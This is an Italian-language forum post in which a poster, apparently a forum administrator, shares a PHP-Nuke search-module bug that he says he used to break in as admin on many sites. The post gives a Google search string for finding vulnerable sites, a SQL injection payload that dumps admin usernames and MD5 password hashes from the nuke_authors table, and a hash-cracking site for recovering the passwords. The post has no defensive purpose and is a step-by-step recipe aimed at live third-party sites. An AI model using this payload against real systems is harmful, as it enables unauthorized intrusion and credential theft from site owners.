|
|
- Group:
- ,,,..--::|| AMMINISTRATORE ||::--..,,,
- Posts:
- 1,602
- Location:
- Scheda di rete
- Status:
| |
| Ecco un bug di php-nuke con il quale sono riuscito ad entrare come admin in molti siti. Andate su google e scrivete questa stringa: CITAZIONE inurl:/phpnuke/modules.php?name=search Google troverą dei siti in php-nuke e vi manderą alla pagina di search, dove dovrebbe essere il bug. Adesso entrate in uno di quei siti e scrivete questa stringa nel search: CITAZIONE p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* Cliccate per cercare. Se il sito ha il bug non fixato vi troverą la password dell'admin o degli admin cryptata in md5. Adesso dovete decryptarla. Un ottimo sito per farlo č http://passcracking.com/index.php |
| | |
